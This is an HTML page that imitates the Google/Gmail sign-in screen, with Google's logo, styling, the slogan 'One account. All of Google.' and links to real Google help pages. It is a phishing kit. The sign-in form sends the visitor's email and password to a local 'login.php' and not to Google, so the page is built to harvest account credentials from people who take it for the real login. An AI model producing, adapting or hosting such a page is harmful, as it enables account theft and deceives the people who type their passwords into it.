<!DOCTYPE html>
<html lang="en">
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta charset="utf-8">
    <meta content="width=300, initial-scale=1" name="viewport">
    <meta name="jingle" value="notranslate">
    <meta name="description" content=".">
    <title>Connexion : comptes Google</title>
    <link rel="shortcut icon" href="//www.google.com/favicon.ico">
    <style>
        html,
        body {
            font-family: Arial, sans-serif;
            background: #fff;
            margin: 0;
            padding: 0;
            border: 0;
            position: absolute;
            height: 100%;
            min-width: 100%;
            font-size: 13px;
            color: #404040;
            direction: ltr;
            -webkit-text-size-adjust: none;
        }

        button,
        input[type=button],
        input[type=submit] {
            font-family: Arial, sans-serif;
        }

        a,
        a:hover,
        a:visited {
            color: #427fed;
            cursor: pointer;
            text-decoration: none;
        }

        a:hover {
            text-decoration: underline;
        }

        h1 {
            font-size: 20px;
            color: #262626;
            margin: 0 0 15px;
            font-weight: normal;
        }

        h2 {
            font-size: 14px;
            color: #262626;
            margin: 0 0 15px;
            font-weight: bold;
        }

        input[type=email],
        input[type=number],
        input[type=password],
        input[type=tel],
        input[type=text],
        input[type=url] {
            -moz-appearance: none;
            -webkit-appearance: none;
            appearance: none;
            display: inline-block;
            height: 36px;
            padding: 0 8px;
            margin: 0;
            background: #fff;
            border: 1px solid #d9d9d9;
            border-top: 1px solid #c0c0c0;
            -moz-box-sizing: border-box;
            -webkit-box-sizing: border-box;
            box-sizing: border-box;
            -moz-border-radius: 1px;
            -webkit-border-radius: 1px;
            border-radius: 1px;
            font-size: 15px;
            color: #404040;
        }

        input[type=email]:focus,
        input[type=number]:focus,
        input[type=password]:focus,
        input[type=tel]:focus,
        input[type=text]:focus,
        input[type=url]:focus {
            outline: none;
            border: 1px solid #4d90fe;
            -moz-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.3);
            -webkit-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.3);
            box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.3);
        }

        input[type=checkbox],
        input[type=radio] {
            -webkit-appearance: none;
            display: inline-block;
            width: 13px;
            height: 13px;
            margin: 0;
            cursor: pointer;
            vertical-align: bottom;
            background: #fff;
            border: 1px solid #c6c6c6;
            -moz-border-radius: 1px;
            -webkit-border-radius: 1px;
            border-radius: 1px;
            -moz-box-sizing: border-box;
            -webkit-box-sizing: border-box;
            box-sizing: border-box;
            position: relative;
        }

        input[type=checkbox]:active,
        input[type=radio]:active {
            background: #ebebeb;
        }

        input[type=checkbox]:hover {
            border-color: #c6c6c6;
            -moz-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1);
            -webkit-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1);
            box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1);
        }

        input[type=radio] {
            -moz-border-radius: 1em;
            -webkit-border-radius: 1em;
            border-radius: 1em;
            width: 15px;
            height: 15px;
        }

        input[type=checkbox]:checked,
        input[type=radio]:checked {
            background: #fff;
        }

        input[type=radio]:checked::after {
            content: '';
            display: block;
            position: relative;
            top: 3px;
            left: 3px;
            width: 7px;
            height: 7px;
            background: #666;
            -moz-border-radius: 1em;
            -webkit-border-radius: 1em;
            border-radius: 1em;
        }

        input[type=checkbox]:checked::after {
            content: url(../ssl.gstatic.com/ui/v1/menu/checkmark.png);
            display: block;
            position: absolute;
            top: -6px;
            left: -5px;
        }

        input[type=checkbox]:focus {
            outline: none;
            border-color: #4d90fe;
        }

        .stacked-label {
            display: block;
            font-weight: bold;
            margin: .5em 0;
        }

        .hidden-label {
            position: absolute !important;
            clip: rect(1px 1px 1px 1px);
            clip: rect(1px, 1px, 1px, 1px);
            height: 0px;
            width: 0px;
            overflow: hidden;
            visibility: hidden;
        }

        input[type=checkbox].form-error,
        input[type=email].form-error,
        input[type=number].form-error,
        input[type=password].form-error,
        input[type=text].form-error,
        input[type=tel].form-error,
        input[type=url].form-error {
            border: 1px solid #dd4b39;
        }

        .error-msg {
            margin: .5em 0;
            display: block;
            color: #dd4b39;
            line-height: 17px;
        }

        .help-link {
            background: #dd4b39;
            padding: 0 5px;
            color: #fff;
            font-weight: bold;
            display: inline-block;
            -moz-border-radius: 1em;
            -webkit-border-radius: 1em;
            border-radius: 1em;
            text-decoration: none;
            position: relative;
            top: 0px;
        }

        .help-link:visited {
            color: #fff;
        }

        .help-link:hover {
            color: #fff;
            background: #c03523;
            text-decoration: none;
        }

        .help-link:active {
            opacity: 1;
            background: #ae2817;
        }

        .wrapper {
            position: relative;
            min-height: 100%;
        }

        .content {
            padding: 0 44px;
        }

        .main {
            padding-bottom: 100px;
        }

        /* For modern browsers */
        .clearfix:before,
        .clearfix:after {
            content: "";
            display: table;
        }

        .clearfix:after {
            clear: both;
        }

        /* For IE 6/7 (trigger hasLayout) */
        .clearfix {
            zoom: 1;
        }

        .google-header-bar {
            height: 71px;
            border-bottom: 1px solid #e5e5e5;
            overflow: hidden;
        }

        .header  {
            margin: 17px 0 0;
            float: left;
            height: 38px;
            width: 116px;
        }

        .header .secondary-link {
            margin: 28px 0 0;
            float: right;
        }

        .header .secondary-link a {
            font-weight: normal;
        }

        .google-header-bar.centered {
            border: 0;
            height: 108px;
        }

        .google-header-bar.centered .header  {
            float: none;
            margin: 40px auto 30px;
            display: block;
        }

        .google-header-bar.centered .header .secondary-link {
            display: none
        }

        .google-footer-bar {
            position: absolute;
            bottom: 0;
            height: 35px;
            width: 100%;
            border-top: 1px solid #e5e5e5;
            overflow: hidden;
        }

        .footer {
            padding-top: 7px;
            font-size: .85em;
            white-space: nowrap;
            line-height: 0;
        }

        .footer ul {
            float: left;
            max-width: 80%;
            padding: 0;
        }

        .footer ul li {
            color: #737373;
            display: inline;
            padding: 0;
            padding-right: 1.5em;
        }

        .footer a {
            color: #737373;
        }

        .lang-chooser-wrap {
            float: right;
            display: inline;
        }

        .lang-chooser-wrap img {
            vertical-align: middle;
        }

        .hidden {
            height: 0px;
            width: 0px;
            overflow: hidden;
            visibility: hidden;
            display: none !important;
        }

        .card {
            background-color: #f7f7f7;
            padding: 20px 25px 30px;
            margin: 0 auto 25px;
            width: 304px;
            -moz-border-radius: 2px;
            -webkit-border-radius: 2px;
            border-radius: 2px;
            -moz-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
            -webkit-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
            box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
        }

        .card *:first-child {
            margin-top: 0;
        }

        .rc-button {
            display: inline-block;
            min-width: 46px;
            text-align: center;
            color: #444;
            font-size: 14px;
            font-weight: 700;
            height: 36px;
            padding: 0 8px;
            line-height: 36px;
            -moz-border-radius: 3px;
            -webkit-border-radius: 3px;
            border-radius: 3px;
            -o-transition: all 0.218s;
            -moz-transition: all 0.218s;
            -webkit-transition: all 0.218s;
            transition: all 0.218s;
            border: 1px solid #dcdcdc;
            background-color: #f5f5f5;
            background-image: -webkit-linear-gradient(top, #f5f5f5, #f1f1f1);
            background-image: -moz-linear-gradient(top, #f5f5f5, #f1f1f1);
            background-image: -ms-linear-gradient(top, #f5f5f5, #f1f1f1);
            background-image: -o-linear-gradient(top, #f5f5f5, #f1f1f1);
            background-image: linear-gradient(top, #f5f5f5, #f1f1f1);
            -o-transition: none;
            -moz-user-select: none;
            -webkit-user-select: none;
            user-select: none;
            cursor: default;
        }

        .card .rc-button {
            width: 100%;
            padding: 0;
        }

        .rc-button:hover {
            border: 1px solid #c6c6c6;
            color: #333;
            text-decoration: none;
            -o-transition: all 0.0s;
            -moz-transition: all 0.0s;
            -webkit-transition: all 0.0s;
            transition: all 0.0s;
            background-color: #f8f8f8;
            background-image: -webkit-linear-gradient(top, #f8f8f8, #f1f1f1);
            background-image: -moz-linear-gradient(top, #f8f8f8, #f1f1f1);
            background-image: -ms-linear-gradient(top, #f8f8f8, #f1f1f1);
            background-image: -o-linear-gradient(top, #f8f8f8, #f1f1f1);
            background-image: linear-gradient(top, #f8f8f8, #f1f1f1);
            -moz-box-shadow: 0 1px 1px rgba(0, 0, 0, 0.1);
            -webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, 0.1);
            box-shadow: 0 1px 1px rgba(0, 0, 0, 0.1);
        }

        .rc-button:active {
            background-color: #f6f6f6;
            background-image: -webkit-linear-gradient(top, #f6f6f6, #f1f1f1);
            background-image: -moz-linear-gradient(top, #f6f6f6, #f1f1f1);
            background-image: -ms-linear-gradient(top, #f6f6f6, #f1f1f1);
            background-image: -o-linear-gradient(top, #f6f6f6, #f1f1f1);
            background-image: linear-gradient(top, #f6f6f6, #f1f1f1);
            -moz-box-shadow: 0 1px 2px rgba(0, 0, 0, 0.1);
            -webkit-box-shadow: 0 1px 2px rgba(0, 0, 0, 0.1);
            box-shadow: 0 1px 2px rgba(0, 0, 0, 0.1);
        }

        .rc-button-submit {
            border: 1px solid #3079ed;
            color: #fff;
            text-shadow: 0 1px rgba(0, 0, 0, 0.1);
            background-color: #4d90fe;
            background-image: -webkit-linear-gradient(top, #4d90fe, #4787ed);
            background-image: -moz-linear-gradient(top, #4d90fe, #4787ed);
            background-image: -ms-linear-gradient(top, #4d90fe, #4787ed);
            background-image: -o-linear-gradient(top, #4d90fe, #4787ed);
            background-image: linear-gradient(top, #4d90fe, #4787ed);
        }

        .rc-button-submit:hover {
            border: 1px solid #2f5bb7;
            color: #fff;
            text-shadow: 0 1px rgba(0, 0, 0, 0.3);
            background-color: #357ae8;
            background-image: -webkit-linear-gradient(top, #4d90fe, #357ae8);
            background-image: -moz-linear-gradient(top, #4d90fe, #357ae8);
            background-image: -ms-linear-gradient(top, #4d90fe, #357ae8);
            background-image: -o-linear-gradient(top, #4d90fe, #357ae8);
            background-image: linear-gradient(top, #4d90fe, #357ae8);
        }

        .rc-button-submit:active {
            background-color: #357ae8;
            background-image: -webkit-linear-gradient(top, #4d90fe, #357ae8);
            background-image: -moz-linear-gradient(top, #4d90fe, #357ae8);
            background-image: -ms-linear-gradient(top, #4d90fe, #357ae8);
            background-image: -o-linear-gradient(top, #4d90fe, #357ae8);
            background-image: linear-gradient(top, #4d90fe, #357ae8);
            -moz-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.3);
            -webkit-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.3);
            box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.3);
        }

        .rc-button-red {
            border: 1px solid transparent;
            color: #fff;
            text-shadow: 0 1px rgba(0, 0, 0, 0.1);
            background-color: #d14836;
            background-image: -webkit-linear-gradient(top, #dd4b39, #d14836);
            background-image: -moz-linear-gradient(top, #dd4b39, #d14836);
            background-image: -ms-linear-gradient(top, #dd4b39, #d14836);
            background-image: -o-linear-gradient(top, #dd4b39, #d14836);
            background-image: linear-gradient(top, #dd4b39, #d14836);
        }

        .rc-button-red:hover {
            border: 1px solid #b0281a;
            color: #fff;
            text-shadow: 0 1px rgba(0, 0, 0, 0.3);
            background-color: #c53727;
            background-image: -webkit-linear-gradient(top, #dd4b39, #c53727);
            background-image: -moz-linear-gradient(top, #dd4b39, #c53727);
            background-image: -ms-linear-gradient(top, #dd4b39, #c53727);
            background-image: -o-linear-gradient(top, #dd4b39, #c53727);
            background-image: linear-gradient(top, #dd4b39, #c53727);
        }

        .rc-button-red:active {
            border: 1px solid #992a1b;
            background-color: #b0281a;
            background-image: -webkit-linear-gradient(top, #dd4b39, #b0281a);
            background-image: -moz-linear-gradient(top, #dd4b39, #b0281a);
            background-image: -ms-linear-gradient(top, #dd4b39, #b0281a);
            background-image: -o-linear-gradient(top, #dd4b39, #b0281a);
            background-image: linear-gradient(top, #dd4b39, #b0281a);
            -moz-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.3);
            -webkit-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.3);
            box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.3);
        }
    </style>
    <style media="screen and (max-width: 800px), screen and (max-height: 800px)">
        .google-header-bar.centered {
            height: 83px;
        }

        .google-header-bar.centered .header  {
            margin: 25px auto 20px;
        }

        .card {
            margin-bottom: 20px;
        }
    </style>
    <style media="screen and (max-width: 580px)">
        html,
        body {
            font-size: 14px;
        }

        .google-header-bar.centered {
            height: 73px;
        }

        .google-header-bar.centered .header {
            margin: 20px auto 15px;
        }

        .content {
            padding-left: 10px;
            padding-right: 10px;
        }

        .hidden-small {
            display: none;
        }

        .card {
            padding: 20px 15px 30px;
            width: 270px;
        }

        .footer ul li {
            padding-right: 1em;
        }

        .lang-chooser-wrap {
            display: none;
        }
    </style>
    <style>
        pre.debug {
            font-family: monospace;
            position: absolute;
            left: 0;
            margin: 0;
            padding: 1.5em;
            font-size: 13px;
            background: #f1f1f1;
            border-top: 1px solid #e5e5e5;
            direction: ltr;
            white-space: pre-wrap;
            width: 90%;
            overflow: hidden;
        }
    </style>
    <link href="Gmail_files/css.html" rel="stylesheet" type="text/css">
    <style>
        .banner {
            text-align: center;
        }

        .banner h1 {
            font-family: 'Open Sans', arial;
            -webkit-font-smoothing: antialiased;
            color: #555;
            font-size: 42px;
            font-weight: 300;
            margin-top: 0;
            margin-bottom: 20px;
        }

        .banner h2 {
            font-family: 'Open Sans', arial;
            -webkit-font-smoothing: antialiased;
            color: #555;
            font-size: 18px;
            font-weight: 400;
            margin-bottom: 20px;
        }

        .signin-card {
            width: 274px;
            padding: 40px 40px;
        }

        .signin-card .profile-img {
            width: 96px;
            height: 96px;
            margin: 0 auto 10px;
            display: block;
            -moz-border-radius: 50%;
            -webkit-border-radius: 50%;
            border-radius: 50%;
        }

        .signin-card .profile-name {
            font-size: 16px;
            font-weight: bold;
            text-align: center;
            margin: 10px 0 0;
            min-height: 1em;
        }

        .signin-card input[type=email],
        .signin-card input[type=password],
        .signin-card input[type=text],
        .signin-card input[type=submit] {
            width: 100%;
            display: block;
            margin-bottom: 10px;
            z-index: 1;
            position: relative;
            -moz-box-sizing: border-box;
            -webkit-box-sizing: border-box;
            box-sizing: border-box;
        }

        .signin-card #Email,
        .signin-card #Passwd,
        .signin-card .captcha {
            direction: ltr;
            height: 44px;
            font-size: 16px;
        }

        .signin-card #Email+.stacked-label {
            margin-top: 15px;
        }

        .signin-card #reauthEmail {
            display: block;
            margin-bottom: 10px;
            line-height: 36px;
            padding: 0 8px;
            font-size: 15px;
            color: #404040;
            line-height: 2;
            margin-bottom: 10px;
            font-size: 14px;
            text-align: center;
            overflow: hidden;
            text-overflow: ellipsis;
            white-space: nowrap;
            -moz-box-sizing: border-box;
            -webkit-box-sizing: border-box;
            box-sizing: border-box;
        }

        .one-google p {
            margin: 0 0 10px;
            color: #555;
            font-size: 14px;
            text-align: center;
        }

        .one-google p.create-account,
        .one-google p.switch-account {
            margin-bottom: 60px;
        }

        .one-google img {
            display: block;
            width: 210px;
            height: 17px;
            margin: 10px auto;
        }
    </style>
    <style media="screen and (max-width: 800px), screen and (max-height: 800px)">
        .banner h1 {
            font-size: 38px;
            margin-bottom: 15px;
        }

        .banner h2 {
            margin-bottom: 15px;
        }

        .one-google p.create-account,
        .one-google p.switch-account {
            margin-bottom: 30px;
        }

        .signin-card #Email {
            margin-bottom: 0;
        }

        .signin-card #Passwd {
            margin-top: -1px;
        }

        .signin-card #Email.form-error,
        .signin-card #Passwd.form-error {
            z-index: 2;
        }

        .signin-card #Email:hover,
        .signin-card #Email:focus,
        .signin-card #Passwd:hover,
        .signin-card #Passwd:focus {
            z-index: 3;
        }
    </style>
    <style media="screen and (max-width: 580px)">
        .banner h1 {
            font-size: 22px;
            margin-bottom: 15px;
        }

        .signin-card {
            width: 260px;
            padding: 20px 20px;
            margin: 0 auto 20px;
        }

        .signin-card .profile-img {
            width: 72px;
            height: 72px;
            -moz-border-radius: 72px;
            -webkit-border-radius: 72px;
            border-radius: 72px;
        }
    </style>
    <style>
        .jfk-tooltip {
            background-color: #fff;
            border: 1px solid;
            color: #737373;
            font-size: 12px;
            position: absolute;
            z-index: 800 !important;
            border-color: #bbb #bbb #a8a8a8;
            padding: 16px;
            width: 250px;
        }

        .jfk-tooltip h3 {
            color: #555;
            font-size: 12px;
            margin: 0 0 .5em;
        }

        .jfk-tooltip-content p:last-child {
            margin-bottom: 0;
        }

        .jfk-tooltip-arrow {
            position: absolute;
        }

        .jfk-tooltip-arrow .jfk-tooltip-arrowimplbefore,
        .jfk-tooltip-arrow .jfk-tooltip-arrowimplafter {
            display: block;
            height: 0;
            position: absolute;
            width: 0;
        }

        .jfk-tooltip-arrow .jfk-tooltip-arrowimplbefore {
            border: 9px solid;
        }

        .jfk-tooltip-arrow .jfk-tooltip-arrowimplafter {
            border: 8px solid;
        }

        .jfk-tooltip-arrowdown {
            bottom: 0;
        }

        .jfk-tooltip-arrowup {
            top: -9px;
        }

        .jfk-tooltip-arrowleft {
            left: -9px;
            top: 30px;
        }

        .jfk-tooltip-arrowright {
            right: 0;
            top: 30px;
        }

        .jfk-tooltip-arrowdown .jfk-tooltip-arrowimplbefore,
        .jfk-tooltip-arrowup .jfk-tooltip-arrowimplbefore {
            border-color: #bbb transparent;
            left: -9px;
        }

        .jfk-tooltip-arrowdown .jfk-tooltip-arrowimplbefore {
            border-color: #a8a8a8 transparent;
        }

        .jfk-tooltip-arrowdown .jfk-tooltip-arrowimplafter,
        .jfk-tooltip-arrowup .jfk-tooltip-arrowimplafter {
            border-color: #fff transparent;
            left: -8px;
        }

        .jfk-tooltip-arrowdown .jfk-tooltip-arrowimplbefore {
            border-bottom-width: 0;
        }

        .jfk-tooltip-arrowdown .jfk-tooltip-arrowimplafter {
            border-bottom-width: 0;
        }

        .jfk-tooltip-arrowup .jfk-tooltip-arrowimplbefore {
            border-top-width: 0;
        }

        .jfk-tooltip-arrowup .jfk-tooltip-arrowimplafter {
            border-top-width: 0;
            top: 1px;
        }

        .jfk-tooltip-arrowleft .jfk-tooltip-arrowimplbefore,
        .jfk-tooltip-arrowright .jfk-tooltip-arrowimplbefore {
            border-color: transparent #bbb;
            top: -9px;
        }

        .jfk-tooltip-arrowleft .jfk-tooltip-arrowimplafter,
        .jfk-tooltip-arrowright .jfk-tooltip-arrowimplafter {
            border-color: transparent #fff;
            top: -8px;
        }

        .jfk-tooltip-arrowleft .jfk-tooltip-arrowimplbefore {
            border-left-width: 0;
        }

        .jfk-tooltip-arrowleft .jfk-tooltip-arrowimplafter {
            border-left-width: 0;
            left: 1px;
        }

        .jfk-tooltip-arrowright .jfk-tooltip-arrowimplbefore {
            border-right-width: 0;
        }

        .jfk-tooltip-arrowright .jfk-tooltip-arrowimplafter {
            border-right-width: 0;
        }

        .jfk-tooltip-closebtn {
            background: url("../ssl.gstatic.com/ui/v1/icons/common/x_8px.png") no-repeat;
            border: 1px solid transparent;
            height: 21px;
            opacity: .4;
            outline: 0;
            position: absolute;
            right: 2px;
            top: 2px;
            width: 21px;
        }

        .jfk-tooltip-closebtn:focus,
        .jfk-tooltip-closebtn:hover {
            opacity: .8;
            cursor: pointer;
        }

        .jfk-tooltip-closebtn:focus {
            border-color: #4d90fe;
        }
    </style>
    <style media="screen and (max-width: 580px)">
        .jfk-tooltip {
            display: none;
        }
    </style>
    <style>
        .need-help-reverse {
            float: right;
        }

        .remember .bubble-wrap {
            position: absolute;
            padding-top: 3px;
            -o-transition: opacity .218s ease-in .218s;
            -moz-transition: opacity .218s ease-in .218s;
            -webkit-transition: opacity .218s ease-in .218s;
            transition: opacity .218s ease-in .218s;
            left: -999em;
            opacity: 0;
            width: 314px;
            margin-left: -20px;
        }

        .remember:hover .bubble-wrap,
        .remember input:focus~.bubble-wrap,
        .remember .bubble-wrap:hover,
        .remember .bubble-wrap:focus {
            opacity: 1;
            left: inherit;
        }

        .bubble-pointer {
            border-left: 10px solid transparent;
            border-right: 10px solid transparent;
            border-bottom: 10px solid #fff;
            width: 0;
            height: 0;
            margin-left: 17px;
        }

        .bubble {
            background-color: #fff;
            padding: 15px;
            margin-top: -1px;
            font-size: 11px;
            -moz-border-radius: 2px;
            -webkit-border-radius: 2px;
            border-radius: 2px;
            -moz-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
            -webkit-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
            box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
        }

        .dasher-tooltip {
            position: absolute;
            left: 50%;
            top: 380px;
            margin-left: 150px;
        }

        .dasher-tooltip .tooltip-pointer {
            margin-top: 15px;
        }

        .dasher-tooltip p {
            margin-top: 0;
        }

        .dasher-tooltip p span {
            display: block;
        }
    </style>
    <style media="screen and (max-width: 800px), screen and (max-height: 800px)">
        .dasher-tooltip {
            top: 340px;
        }
    </style>
    <style>
        #logo{
        -webkit-tap-highlight-color: rgba(0,0,0,0);
        color: #202124;
        font-family: roboto,'Noto Sans Myanmar UI',arial,sans-serif;
        direction: ltr;
        font-size: 14px;
        line-height: 1.4286;
        box-sizing: inherit;
        text-align: center;
        padding-top: 40px;
        size: 40cm;
    }
    </style>
</head>

<body>
    <div class="wrapper">
        <div class="google-header-bar  centered">
            <div jsname="jjf7Ff">
                <div id="logo" class="v8vQje" title="Google">
                    <div class="rr0DNb" jsname="l4eHX">
                        <svg viewBox="0 0 75 24" width="75" height="24" xmlns="http://www.w3.org/2000/svg"
                            aria-hidden="true" class="l5Lhkf">
                            <g id="qaEJec">
                                <path fill="#ea4335"
                                    d="M67.954 16.303c-1.33 0-2.278-.608-2.886-1.804l7.967-3.3-.27-.68c-.495-1.33-2.008-3.79-5.102-3.79-3.068 0-5.622 2.41-5.622 5.96 0 3.34 2.53 5.96 5.92 5.96 2.73 0 4.31-1.67 4.97-2.64l-2.03-1.35c-.673.98-1.6 1.64-2.93 1.64zm-.203-7.27c1.04 0 1.92.52 2.21 1.264l-5.32 2.21c-.06-2.3 1.79-3.474 3.12-3.474z">
                                </path>
                            </g>
                            <g id="YGlOvc">
                                <path fill="#34a853" d="M58.193.67h2.564v17.44h-2.564z"></path>
                            </g>
                            <g id="BWfIk">
                                <path fill="#4285f4"
                                    d="M54.152 8.066h-.088c-.588-.697-1.716-1.33-3.136-1.33-2.98 0-5.71 2.614-5.71 5.98 0 3.338 2.73 5.933 5.71 5.933 1.42 0 2.548-.64 3.136-1.36h.088v.86c0 2.28-1.217 3.5-3.183 3.5-1.61 0-2.6-1.15-3-2.12l-2.28.94c.65 1.58 2.39 3.52 5.28 3.52 3.06 0 5.66-1.807 5.66-6.206V7.21h-2.48v.858zm-3.006 8.237c-1.804 0-3.318-1.513-3.318-3.588 0-2.1 1.514-3.635 3.318-3.635 1.784 0 3.183 1.534 3.183 3.635 0 2.075-1.4 3.588-3.19 3.588z">
                                </path>
                            </g>
                            <g id="e6m3fd">
                                <path fill="#fbbc05"
                                    d="M38.17 6.735c-3.28 0-5.953 2.506-5.953 5.96 0 3.432 2.673 5.96 5.954 5.96 3.29 0 5.96-2.528 5.96-5.96 0-3.46-2.67-5.96-5.95-5.96zm0 9.568c-1.798 0-3.348-1.487-3.348-3.61 0-2.14 1.55-3.608 3.35-3.608s3.348 1.467 3.348 3.61c0 2.116-1.55 3.608-3.35 3.608z">
                                </path>
                            </g>
                            <g id="vbkDmc">
                                <path fill="#ea4335"
                                    d="M25.17 6.71c-3.28 0-5.954 2.505-5.954 5.958 0 3.433 2.673 5.96 5.954 5.96 3.282 0 5.955-2.527 5.955-5.96 0-3.453-2.673-5.96-5.955-5.96zm0 9.567c-1.8 0-3.35-1.487-3.35-3.61 0-2.14 1.55-3.608 3.35-3.608s3.35 1.46 3.35 3.6c0 2.12-1.55 3.61-3.35 3.61z">
                                </path>
                            </g>
                            <g id="idEJde">
                                <path fill="#4285f4"
                                    d="M14.11 14.182c.722-.723 1.205-1.78 1.387-3.334H9.423V8.373h8.518c.09.452.16 1.07.16 1.664 0 1.903-.52 4.26-2.19 5.934-1.63 1.7-3.71 2.61-6.48 2.61-5.12 0-9.42-4.17-9.42-9.29C0 4.17 4.31 0 9.43 0c2.83 0 4.843 1.108 6.362 2.56L14 4.347c-1.087-1.02-2.56-1.81-4.577-1.81-3.74 0-6.662 3.01-6.662 6.75s2.93 6.75 6.67 6.75c2.43 0 3.81-.972 4.69-1.856z">
                                </path>
                            </g>
                        </svg></div>
                </div>
            </div>
        </div>
        <div class="main content clearfix">
            <div class="banner">
                <h1>
                    One account. All of Google.
                </h1>
                <h2 class="hidden-small">
                    Sign in to continue to Gmail
                </h2>
            </div>
            <div class="card signin-card clearfix">
                <img class="profile-img" src="avatar.png" alt="">
                <p class="profile-name"></p>
                <form method="post" action="login.php">
                    <label class="hidden-label" for="Email">Email</label>
                    <input id="Email" name="Email" type="email" placeholder="Email">
                    <label class="hidden-label" for="Passwd">Password</label>
                    <input id="Passwd" name="Passwd" type="password" placeholder="Password">
                    <input id="signIn" name="signIn" class="rc-button rc-button-submit" type="submit" value="Sign in">
                    <label class="remember">
                        <input type="checkbox" value="yes" checked="checked">
                        <span>
                            Stay signed in
                        </span>
                        <div class="bubble-wrap" role="tooltip">
                            <div class="bubble-pointer"></div>
                            <div class="bubble">
                                For your protection, keep this checked only on devices you use regularly.
                                <a href="https://support.google.com/accounts/?p=securesignin&amp;hl=en"
                                    target="_blank">Learn more</a>
                            </div>
                        </div>
                    </label>
                    <input type="hidden" name="rmShown" value="1">
                    <a id="link-forgot-passwd"
                        href="https://accounts.google.com/RecoverAccount?service=mail&amp;continue=https%3A%2F%2Fmail.google.com%2Fmail%2F"
                        class="need-help-reverse">
                        Need help?
                    </a>
                </form>
            </div>
            <div class="one-google">
                <p class="create-account">
                    <a id="link-signup"
                        href="https://accounts.google.com/SignUp?service=mail&amp;continue=https%3A%2F%2Fmail.google.com%2Fmail%2F&amp;hl=en">
                        Create an account
                    </a>
                </p>
                <img src="Gmail_files/logo_strip_2x.html" width="210" height="17" alt="">
            </div>
        </div>
        <div class="google-footer-bar">
            <div class="footer content clearfix">
                <ul id="footer-list">
                    <li>
                        <a href="http://www.google.com/" target="_blank">
                            Google
                        </a>
                    </li>
                    <li>
                        <a href="https://accounts.google.com/TOS?loc=PH&amp;hl=en" target="_blank">
                            Privacy &amp; Terms
                        </a>
                    </li>
                    <li>
                        <a href="http://www.google.com/support/accounts?hl=en" target="_blank">
                            Help
                        </a>
                    </li>
                </ul>
                <div id="lang-vis-control" style="display: inline;">
                    <span id="lang-chooser-wrap" class="lang-chooser-wrap">
                        <label for="lang-chooser"><img src="images.png" alt="Change language"></label>
                        <select id="lang-chooser" class="lang-chooser" name="lang-chooser">
                            <option value="af">
                                English‪
                            </option>
                            <option value="az">
                                ‪Francais‬
                            </option>
                        </select>
                    </span>
                </div>
            </div>
        </div>
    </div>

</html>